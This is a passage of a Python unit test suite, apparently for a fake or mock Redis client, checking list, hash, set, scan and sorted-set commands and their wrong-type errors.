with self.assertRaises(redis.ResponseError):
self.redis.blpop('foo', timeout=1)
def test_brpop_test_multiple_lists(self):
self.redis.rpush('baz', 'zero')
self.assertEqual(self.redis.brpop(['foo', 'baz'], timeout=1),
(b'baz', b'zero'))
self.assertFalse(self.redis.exists('baz'))
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.brpop(['bar', 'foo'], timeout=1),
(b'foo', b'two'))
def test_brpop_single_key(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.brpop('foo', timeout=1),
(b'foo', b'two'))
def test_brpop_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.brpop('foo', timeout=1)
def test_brpoplpush_multi_keys(self):
self.assertEqual(self.redis.lpop('bar'), None)
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.brpoplpush('foo', 'bar', timeout=1),
b'two')
self.assertEqual(self.redis.lrange('bar', 0, -1), [b'two'])
# Catch instances where we store bytes and strings inconsistently
# and thus bar = ['two']
self.assertEqual(self.redis.lrem('bar', -1, 'two'), 1)
def test_brpoplpush_wrong_type(self):
self.redis.set('foo', 'bar')
self.redis.rpush('list', 'element')
with self.assertRaises(redis.ResponseError):
self.redis.brpoplpush('foo', 'list')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
with self.assertRaises(redis.ResponseError):
self.redis.brpoplpush('list', 'foo')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
@attr('slow')
def test_blocking_operations_when_empty(self):
self.assertEqual(self.redis.blpop(['foo'], timeout=1),
None)
self.assertEqual(self.redis.blpop(['bar', 'foo'], timeout=1),
None)
self.assertEqual(self.redis.brpop('foo', timeout=1),
None)
self.assertEqual(self.redis.brpoplpush('foo', 'bar', timeout=1),
None)
def test_empty_list(self):
self.redis.rpush('foo', 'bar')
self.redis.rpop('foo')
self.assertFalse(self.redis.exists('foo'))
# Tests for the hash type.
def test_hstrlen_missing(self):
self.assertEqual(self.redis.hstrlen('foo', 'doesnotexist'), 0)
self.redis.hset('foo', 'key', 'value')
self.assertEqual(self.redis.hstrlen('foo', 'doesnotexist'), 0)
def test_hstrlen(self):
self.redis.hset('foo', 'key', 'value')
self.assertEqual(self.redis.hstrlen('foo', 'key'), 5)
def test_hset_then_hget(self):
self.assertEqual(self.redis.hset('foo', 'key', 'value'), 1)
self.assertEqual(self.redis.hget('foo', 'key'), b'value')
def test_hset_update(self):
self.assertEqual(self.redis.hset('foo', 'key', 'value'), 1)
self.assertEqual(self.redis.hset('foo', 'key', 'value'), 0)
def test_hset_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hset('foo', 'key', 'value')
def test_hgetall(self):
self.assertEqual(self.redis.hset('foo', 'k1', 'v1'), 1)
self.assertEqual(self.redis.hset('foo', 'k2', 'v2'), 1)
self.assertEqual(self.redis.hset('foo', 'k3', 'v3'), 1)
self.assertEqual(self.redis.hgetall('foo'), {b'k1': b'v1',
b'k2': b'v2',
b'k3': b'v3'})
def test_hgetall_with_tuples(self):
self.assertEqual(self.redis.hset('foo', (1, 2), (1, 2, 3)), 1)
self.assertEqual(self.redis.hgetall('foo'), {b'(1, 2)': b'(1, 2, 3)'})
def test_hgetall_empty_key(self):
self.assertEqual(self.redis.hgetall('foo'), {})
def test_hgetall_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hgetall('foo')
def test_hexists(self):
self.redis.hset('foo', 'bar', 'v1')
self.assertEqual(self.redis.hexists('foo', 'bar'), 1)
self.assertEqual(self.redis.hexists('foo', 'baz'), 0)
self.assertEqual(self.redis.hexists('bar', 'bar'), 0)
def test_hexists_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hexists('foo', 'key')
def test_hkeys(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.assertEqual(set(self.redis.hkeys('foo')), set([b'k1', b'k2']))
self.assertEqual(set(self.redis.hkeys('bar')), set([]))
def test_hkeys_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hkeys('foo')
def test_hlen(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.assertEqual(self.redis.hlen('foo'), 2)
def test_hlen_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hlen('foo')
def test_hvals(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.assertEqual(set(self.redis.hvals('foo')), set([b'v1', b'v2']))
self.assertEqual(set(self.redis.hvals('bar')), set([]))
def test_hvals_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hvals('foo')
def test_hmget(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.redis.hset('foo', 'k3', 'v3')
# Normal case.
self.assertEqual(self.redis.hmget('foo', ['k1', 'k3']), [b'v1', b'v3'])
self.assertEqual(self.redis.hmget('foo', 'k1', 'k3'), [b'v1', b'v3'])
# Key does not exist.
self.assertEqual(self.redis.hmget('bar', ['k1', 'k3']), [None, None])
self.assertEqual(self.redis.hmget('bar', 'k1', 'k3'), [None, None])
# Some keys in the hash do not exist.
self.assertEqual(self.redis.hmget('foo', ['k1', 'k500']),
[b'v1', None])
self.assertEqual(self.redis.hmget('foo', 'k1', 'k500'),
[b'v1', None])
def test_hmget_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hmget('foo', 'key1', 'key2')
def test_hdel(self):
self.redis.hset('foo', 'k1', 'v1')
self.redis.hset('foo', 'k2', 'v2')
self.redis.hset('foo', 'k3', 'v3')
self.assertEqual(self.redis.hget('foo', 'k1'), b'v1')
self.assertEqual(self.redis.hdel('foo', 'k1'), True)
self.assertEqual(self.redis.hget('foo', 'k1'), None)
self.assertEqual(self.redis.hdel('foo', 'k1'), False)
# Since redis>=2.7.6 returns number of deleted items.
self.assertEqual(self.redis.hdel('foo', 'k2', 'k3'), 2)
self.assertEqual(self.redis.hget('foo', 'k2'), None)
self.assertEqual(self.redis.hget('foo', 'k3'), None)
self.assertEqual(self.redis.hdel('foo', 'k2', 'k3'), False)
def test_hdel_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hdel('foo', 'key')
def test_hincrby(self):
self.redis.hset('foo', 'counter', 0)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 1)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 2)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 3)
def test_hincrby_with_no_starting_value(self):
self.assertEqual(self.redis.hincrby('foo', 'counter'), 1)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 2)
self.assertEqual(self.redis.hincrby('foo', 'counter'), 3)
def test_hincrby_with_range_param(self):
self.assertEqual(self.redis.hincrby('foo', 'counter', 2), 2)
self.assertEqual(self.redis.hincrby('foo', 'counter', 2), 4)
self.assertEqual(self.redis.hincrby('foo', 'counter', 2), 6)
def test_hincrby_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hincrby('foo', 'key', 2)
def test_hincrbyfloat(self):
self.redis.hset('foo', 'counter', 0.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 1.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 2.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 3.0)
def test_hincrbyfloat_with_no_starting_value(self):
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 1.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 2.0)
self.assertEqual(self.redis.hincrbyfloat('foo', 'counter'), 3.0)
def test_hincrbyfloat_with_range_param(self):
self.assertAlmostEqual(
self.redis.hincrbyfloat('foo', 'counter', 0.1), 0.1)
self.assertAlmostEqual(
self.redis.hincrbyfloat('foo', 'counter', 0.1), 0.2)
self.assertAlmostEqual(
self.redis.hincrbyfloat('foo', 'counter', 0.1), 0.3)
def test_hincrbyfloat_on_non_float_value_raises_error(self):
self.redis.hset('foo', 'counter', 'cat')
with self.assertRaises(redis.ResponseError):
self.redis.hincrbyfloat('foo', 'counter')
def test_hincrbyfloat_with_non_float_amount_raises_error(self):
with self.assertRaises(redis.ResponseError):
self.redis.hincrbyfloat('foo', 'counter', 'cat')
def test_hincrbyfloat_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hincrbyfloat('foo', 'key', 0.1)
def test_hincrbyfloat_precision(self):
x = 1.23456789123456789
self.assertEqual(self.redis.hincrbyfloat('foo', 'bar', x), x)
self.assertEqual(float(self.redis.hget('foo', 'bar')), x)
def test_hsetnx(self):
self.assertEqual(self.redis.hsetnx('foo', 'newkey', 'v1'), True)
self.assertEqual(self.redis.hsetnx('foo', 'newkey', 'v1'), False)
self.assertEqual(self.redis.hget('foo', 'newkey'), b'v1')
def test_hmsetset_empty_raises_error(self):
with self.assertRaises(redis.DataError):
self.redis.hmset('foo', {})
def test_hmsetset(self):
self.redis.hset('foo', 'k1', 'v1')
self.assertEqual(self.redis.hmset('foo', {'k2': 'v2', 'k3': 'v3'}),
True)
def test_hmset_convert_values(self):
self.redis.hmset('foo', {'k1': True, 'k2': 1})
self.assertEqual(
self.redis.hgetall('foo'), {b'k1': b'True', b'k2': b'1'})
def test_hmset_does_not_mutate_input_params(self):
original = {'key': [123, 456]}
self.redis.hmset('foo', original)
self.assertEqual(original, {'key': [123, 456]})
def test_hmset_wrong_type(self):
self.redis.zadd('foo', 1, 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.hmset('foo', {'key': 'value'})
def test_empty_hash(self):
self.redis.hset('foo', 'bar', 'baz')
self.redis.hdel('foo', 'bar')
self.assertFalse(self.redis.exists('foo'))
def test_sadd(self):
self.assertEqual(self.redis.sadd('foo', 'member1'), 1)
self.assertEqual(self.redis.sadd('foo', 'member1'), 0)
self.assertEqual(self.redis.smembers('foo'), set([b'member1']))
self.assertEqual(self.redis.sadd('foo', 'member2', 'member3'), 2)
self.assertEqual(self.redis.smembers('foo'),
set([b'member1', b'member2', b'member3']))
self.assertEqual(self.redis.sadd('foo', 'member3', 'member4'), 1)
self.assertEqual(self.redis.smembers('foo'),
set([b'member1', b'member2', b'member3', b'member4']))
def test_sadd_as_str_type(self):
self.assertEqual(self.redis.sadd('foo', *range(3)), 3)
self.assertEqual(self.redis.smembers('foo'), set([b'0', b'1', b'2']))
def test_sadd_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sadd('foo', 'member2')
def test_scan_single(self):
self.redis.set('foo1', 'bar1')
self.assertEqual(self.redis.scan(match="foo*"), (0, [b'foo1']))
def test_scan_iter_single_page(self):
self.redis.set('foo1', 'bar1')
self.redis.set('foo2', 'bar2')
self.assertEqual(set(self.redis.scan_iter(match="foo*")),
set([b'foo1', b'foo2']))
self.assertEqual(set(self.redis.scan_iter()),
set([b'foo1', b'foo2']))
self.assertEqual(set(self.redis.scan_iter(match="")),
set([]))
def test_scan_iter_multiple_pages(self):
all_keys = key_val_dict(size=100)
self.assertTrue(
all(self.redis.set(k, v) for k, v in all_keys.items()))
self.assertEqual(
set(self.redis.scan_iter()),
set(all_keys))
def test_scan_iter_multiple_pages_with_match(self):
all_keys = key_val_dict(size=100)
self.assertTrue(
all(self.redis.set(k, v) for k, v in all_keys.items()))
# Now add a few keys that don't match the key:<number> pattern.
self.redis.set('otherkey', 'foo')
self.redis.set('andanother', 'bar')
actual = set(self.redis.scan_iter(match='key:*'))
self.assertEqual(actual, set(all_keys))
def test_scan_multiple_pages_with_count_arg(self):
all_keys = key_val_dict(size=100)
self.assertTrue(
all(self.redis.set(k, v) for k, v in all_keys.items()))
self.assertEqual(
set(self.redis.scan_iter(count=1000)),
set(all_keys))
def test_scan_all_in_single_call(self):
all_keys = key_val_dict(size=100)
self.assertTrue(
all(self.redis.set(k, v) for k, v in all_keys.items()))
# Specify way more than the 100 keys we've added.
actual = self.redis.scan(count=1000)
self.assertEqual(set(actual[1]), set(all_keys))
self.assertEqual(actual[0], 0)
@attr('slow')
def test_scan_expired_key(self):
self.redis.set('expiringkey', 'value')
self.redis.pexpire('expiringkey', 1)
sleep(1)
self.assertEqual(self.redis.scan()[1], [])
def test_scard(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('foo', 'member2')
self.assertEqual(self.redis.scard('foo'), 2)
def test_scard_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.scard('foo')
def test_sdiff(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sdiff('foo', 'bar'), set([b'member1']))
# Original sets shouldn't be modified.
self.assertEqual(self.redis.smembers('foo'),
set([b'member1', b'member2']))
self.assertEqual(self.redis.smembers('bar'),
set([b'member2', b'member3']))
def test_sdiff_one_key(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.assertEqual(self.redis.sdiff('foo'),
set([b'member1', b'member2']))
def test_sdiff_empty(self):
self.assertEqual(self.redis.sdiff('foo'), set())
def test_sdiff_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
self.redis.sadd('bar', 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sdiff('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.sdiff('bar', 'foo')
def test_sdiffstore(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sdiffstore('baz', 'foo', 'bar'), 1)
# Catch instances where we store bytes and strings inconsistently
# and thus baz = {'member1', b'member1'}
self.redis.sadd('baz', 'member1')
self.assertEqual(self.redis.scard('baz'), 1)
def test_setrange(self):
self.redis.set('foo', 'test')
self.assertEqual(self.redis.setrange('foo', 1, 'aste'), 5)
self.assertEqual(self.redis.get('foo'), b'taste')
self.redis.set('foo', 'test')
self.assertEqual(self.redis.setrange('foo', 1, 'a'), 4)
self.assertEqual(self.redis.get('foo'), b'tast')
self.assertEqual(self.redis.setrange('bar', 2, 'test'), 6)
self.assertEqual(self.redis.get('bar'), b'\x00\x00test')
def test_setrange_expiry(self):
self.redis.set('foo', 'test', ex=10)
self.redis.setrange('foo', 1, 'aste')
self.assertGreater(self.redis.ttl('foo'), 0)
def test_sinter(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sinter('foo', 'bar'), set([b'member2']))
self.assertEqual(self.redis.sinter('foo'),
set([b'member1', b'member2']))
def test_sinter_bytes_keys(self):
foo = os.urandom(10)
bar = os.urandom(10)
self.redis.sadd(foo, 'member1')
self.redis.sadd(foo, 'member2')
self.redis.sadd(bar, 'member2')
self.redis.sadd(bar, 'member3')
self.assertEqual(self.redis.sinter(foo, bar), set([b'member2']))
self.assertEqual(self.redis.sinter(foo), set([b'member1', b'member2']))
def test_sinter_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
self.redis.sadd('bar', 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sinter('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.sinter('bar', 'foo')
def test_sinterstore(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sinterstore('baz', 'foo', 'bar'), 1)
# Catch instances where we store bytes and strings inconsistently
# and thus baz = {'member2', b'member2'}
self.redis.sadd('baz', 'member2')
self.assertEqual(self.redis.scard('baz'), 1)
def test_sismember(self):
self.assertEqual(self.redis.sismember('foo', 'member1'), False)
self.redis.sadd('foo', 'member1')
self.assertEqual(self.redis.sismember('foo', 'member1'), True)
def test_sismember_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sismember('foo', 'member')
def test_smembers(self):
self.assertEqual(self.redis.smembers('foo'), set())
def test_smembers_copy(self):
self.redis.sadd('foo', 'member1')
set = self.redis.smembers('foo')
self.redis.sadd('foo', 'member2')
self.assertNotEqual(set, self.redis.smembers('foo'))
def test_smembers_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.smembers('foo')
def test_smembers_runtime_error(self):
self.redis.sadd('foo', 'member1', 'member2')
for member in self.redis.smembers('foo'):
self.redis.srem('foo', member)
def test_smove(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.assertEqual(self.redis.smove('foo', 'bar', 'member1'), True)
self.assertEqual(self.redis.smembers('bar'), set([b'member1']))
def test_smove_non_existent_key(self):
self.assertEqual(self.redis.smove('foo', 'bar', 'member1'), False)
def test_move_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
self.redis.sadd('bar', 'member')
with self.assertRaises(redis.ResponseError):
self.redis.smove('bar', 'foo', 'member')
# Must raise the error before removing member from bar
self.assertEqual(self.redis.smembers('bar'), set([b'member']))
with self.assertRaises(redis.ResponseError):
self.redis.smove('foo', 'bar', 'member')
def test_spop(self):
# This is tricky because it pops a random element.
self.redis.sadd('foo', 'member1')
self.assertEqual(self.redis.spop('foo'), b'member1')
self.assertEqual(self.redis.spop('foo'), None)
def test_spop_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.spop('foo')
def test_srandmember(self):
self.redis.sadd('foo', 'member1')
self.assertEqual(self.redis.srandmember('foo'), b'member1')
# Shouldn't be removed from the set.
self.assertEqual(self.redis.srandmember('foo'), b'member1')
def test_srandmember_number(self):
"""srandmember works with the number argument."""
self.assertEqual(self.redis.srandmember('foo', 2), [])
self.redis.sadd('foo', b'member1')
self.assertEqual(self.redis.srandmember('foo', 2), [b'member1'])
self.redis.sadd('foo', b'member2')
self.assertEqual(set(self.redis.srandmember('foo', 2)),
set([b'member1', b'member2']))
self.redis.sadd('foo', b'member3')
res = self.redis.srandmember('foo', 2)
self.assertEqual(len(res), 2)
if self.decode_responses:
superset = set(['member1', 'member2', 'member3'])
else:
superset = set([b'member1', b'member2', b'member3'])
for e in res:
self.assertIn(e, superset)
def test_srandmember_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.srandmember('foo')
def test_srem(self):
self.redis.sadd('foo', 'member1', 'member2', 'member3', 'member4')
self.assertEqual(self.redis.smembers('foo'),
set([b'member1', b'member2', b'member3', b'member4']))
self.assertEqual(self.redis.srem('foo', 'member1'), True)
self.assertEqual(self.redis.smembers('foo'),
set([b'member2', b'member3', b'member4']))
self.assertEqual(self.redis.srem('foo', 'member1'), False)
# Since redis>=2.7.6 returns number of deleted items.
self.assertEqual(self.redis.srem('foo', 'member2', 'member3'), 2)
self.assertEqual(self.redis.smembers('foo'), set([b'member4']))
self.assertEqual(self.redis.srem('foo', 'member3', 'member4'), True)
self.assertEqual(self.redis.smembers('foo'), set([]))
self.assertEqual(self.redis.srem('foo', 'member3', 'member4'), False)
def test_srem_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
with self.assertRaises(redis.ResponseError):
self.redis.srem('foo', 'member')
def test_sunion(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sunion('foo', 'bar'),
set([b'member1', b'member2', b'member3']))
def test_sunion_wrong_type(self):
self.redis.zadd('foo', 1, 'member')
self.redis.sadd('bar', 'member')
with self.assertRaises(redis.ResponseError):
self.redis.sunion('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.sunion('bar', 'foo')
def test_sunionstore(self):
self.redis.sadd('foo', 'member1')
self.redis.sadd('foo', 'member2')
self.redis.sadd('bar', 'member2')
self.redis.sadd('bar', 'member3')
self.assertEqual(self.redis.sunionstore('baz', 'foo', 'bar'), 3)
self.assertEqual(self.redis.smembers('baz'),
set([b'member1', b'member2', b'member3']))
# Catch instances where we store bytes and strings inconsistently
# and thus baz = {b'member1', b'member2', b'member3', 'member3'}
self.redis.sadd('baz', 'member3')
self.assertEqual(self.redis.scard('baz'), 3)
def test_empty_set(self):
self.redis.sadd('foo', 'bar')
self.redis.srem('foo', 'bar')
self.assertFalse(self.redis.exists('foo'))
def test_zadd(self):
self.redis.zadd('foo', four=4)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zadd('foo', 2, 'two', 1, 'one', zero=0), 3)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'zero', b'one', b'two', b'three', b'four'])
self.assertEqual(self.redis.zadd('foo', 7, 'zero', one=1, five=5), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'one', b'two', b'three', b'four', b'five', b'zero'])
def test_zadd_uses_str(self):
self.redis.zadd('foo', 12345, (1, 2, 3))
self.assertEqual(self.redis.zrange('foo', 0, 0), [b'(1, 2, 3)'])
def test_zadd_errors(self):
# The args are backwards, it should be 2, "two", so we
# expect an exception to be raised.
with self.assertRaises(redis.ResponseError):
self.redis.zadd('foo', 'two', 2)
with self.assertRaises(redis.ResponseError):
self.redis.zadd('foo', two='two')
# It's expected an equal number of values and scores
with self.assertRaises(redis.RedisError):
self.redis.zadd('foo', 'two')
# Have to add at least one key/value pair
with self.assertRaises(redis.ResponseError):
self.redis.zadd('foo')
def test_zadd_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zadd('foo', 2, 'two')
def test_zadd_multiple(self):
self.redis.zadd('foo', 1, 'one', 2, 'two')
self.assertEqual(self.redis.zrange('foo', 0, 0),
[b'one'])
self.assertEqual(self.redis.zrange('foo', 1, 1),
[b'two'])
def test_zrange_same_score(self):
self.redis.zadd('foo', two_a=2)
self.redis.zadd('foo', two_b=2)
self.redis.zadd('foo', two_c=2)
self.redis.zadd('foo', two_d=2)
self.redis.zadd('foo', two_e=2)
self.assertEqual(self.redis.zrange('foo', 2, 3),
[b'two_c', b'two_d'])
def test_zcard(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.assertEqual(self.redis.zcard('foo'), 2)
def test_zcard_non_existent_key(self):
self.assertEqual(self.redis.zcard('foo'), 0)
def test_zcard_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zcard('foo')
def test_zcount(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', three=2)
self.redis.zadd('foo', five=5)
self.assertEqual(self.redis.zcount('foo', 2, 4), 1)
self.assertEqual(self.redis.zcount('foo', 1, 4), 2)
self.assertEqual(self.redis.zcount('foo', 0, 5), 3)
self.assertEqual(self.redis.zcount('foo', 4, '+inf'), 1)
self.assertEqual(self.redis.zcount('foo', '-inf', 4), 2)
self.assertEqual(self.redis.zcount('foo', '-inf', '+inf'), 3)
def test_zcount_exclusive(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', three=2)
self.redis.zadd('foo', five=5)
self.assertEqual(self.redis.zcount('foo', '-inf', '(2'), 1)
self.assertEqual(self.redis.zcount('foo', '-inf', 2), 2)
self.assertEqual(self.redis.zcount('foo', '(5', '+inf'), 0)
self.assertEqual(self.redis.zcount('foo', '(1', 5), 2)
self.assertEqual(self.redis.zcount('foo', '(2', '(5'), 0)
self.assertEqual(self.redis.zcount('foo', '(1', '(5'), 1)
self.assertEqual(self.redis.zcount('foo', 2, '(5'), 1)
def test_zcount_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zcount('foo', '-inf', '+inf')
def test_zincrby(self):
self.redis.zadd('foo', one=1)
self.assertEqual(self.redis.zincrby('foo', 'one', 10), 11)
self.assertEqual(self.redis.zrange('foo', 0, -1, withscores=True),
[(b'one', 11)])
def test_zincrby_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zincrby('foo', 'one', 10)
def test_zrange_descending(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrange('foo', 0, -1, desc=True),
[b'three', b'two', b'one'])
def test_zrange_descending_with_scores(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrange('foo', 0, -1, desc=True,
withscores=True),
[(b'three', 3), (b'two', 2), (b'one', 1)])
def test_zrange_with_positive_indices(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrange('foo', 0, 1), [b'one', b'two'])
def test_zrange_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrange('foo', 0, -1)
def test_zrange_score_cast(self):
self.redis.zadd('foo', one=1.2)
self.redis.zadd('foo', two=2.2)
expected_without_cast_round = [(b'one', 1.2), (b'two', 2.2)]
expected_with_cast_round = [(b'one', 1.0), (b'two', 2.0)]
self.assertEqual(self.redis.zrange('foo', 0, 2, withscores=True),
expected_without_cast_round)
self.assertEqual(self.redis.zrange('foo', 0, 2, withscores=True,
score_cast_func=self._round_str),
expected_with_cast_round)
def test_zrank(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrank('foo', 'one'), 0)
self.assertEqual(self.redis.zrank('foo', 'two'), 1)
self.assertEqual(self.redis.zrank('foo', 'three'), 2)
def test_zrank_non_existent_member(self):
self.assertEqual(self.redis.zrank('foo', 'one'), None)
def test_zrank_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrank('foo', 'one')
def test_zrem(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.redis.zadd('foo', four=4)
self.assertEqual(self.redis.zrem('foo', 'one'), True)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'two', b'three', b'four'])
# Since redis>=2.7.6 returns number of deleted items.
self.assertEqual(self.redis.zrem('foo', 'two', 'three'), 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'four'])
self.assertEqual(self.redis.zrem('foo', 'three', 'four'), True)
self.assertEqual(self.redis.zrange('foo', 0, -1), [])
self.assertEqual(self.redis.zrem('foo', 'three', 'four'), False)
def test_zrem_non_existent_member(self):
self.assertFalse(self.redis.zrem('foo', 'one'))
def test_zrem_numeric_member(self):
self.redis.zadd('foo', **{'128': 13.0, '129': 12.0})
self.assertEqual(self.redis.zrem('foo', 128), True)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'129'])
def test_zrem_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrem('foo', 'bar')
def test_zscore(self):
self.redis.zadd('foo', one=54)
self.assertEqual(self.redis.zscore('foo', 'one'), 54)
def test_zscore_non_existent_member(self):
self.assertIsNone(self.redis.zscore('foo', 'one'))
def test_zscore_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zscore('foo', 'one')
def test_zrevrank(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrank('foo', 'one'), 2)
self.assertEqual(self.redis.zrevrank('foo', 'two'), 1)
self.assertEqual(self.redis.zrevrank('foo', 'three'), 0)
def test_zrevrank_non_existent_member(self):
self.assertEqual(self.redis.zrevrank('foo', 'one'), None)
def test_zrevrank_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrank('foo', 'one')
def test_zrevrange(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrange('foo', 0, 1), [b'three', b'two'])
self.assertEqual(self.redis.zrevrange('foo', 0, -1),
[b'three', b'two', b'one'])
def test_zrevrange_sorted_keys(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', 2, 'two_b')
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrange('foo', 0, 2),
[b'three', b'two_b', b'two'])
self.assertEqual(self.redis.zrevrange('foo', 0, -1),
[b'three', b'two_b', b'two', b'one'])
def test_zrevrange_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrange('foo', 0, 2)
def test_zrevrange_score_cast(self):
self.redis.zadd('foo', one=1.2)
self.redis.zadd('foo', two=2.2)
expected_without_cast_round = [(b'two', 2.2), (b'one', 1.2)]
expected_with_cast_round = [(b'two', 2.0), (b'one', 1.0)]
self.assertEqual(self.redis.zrevrange('foo', 0, 2, withscores=True),
expected_without_cast_round)
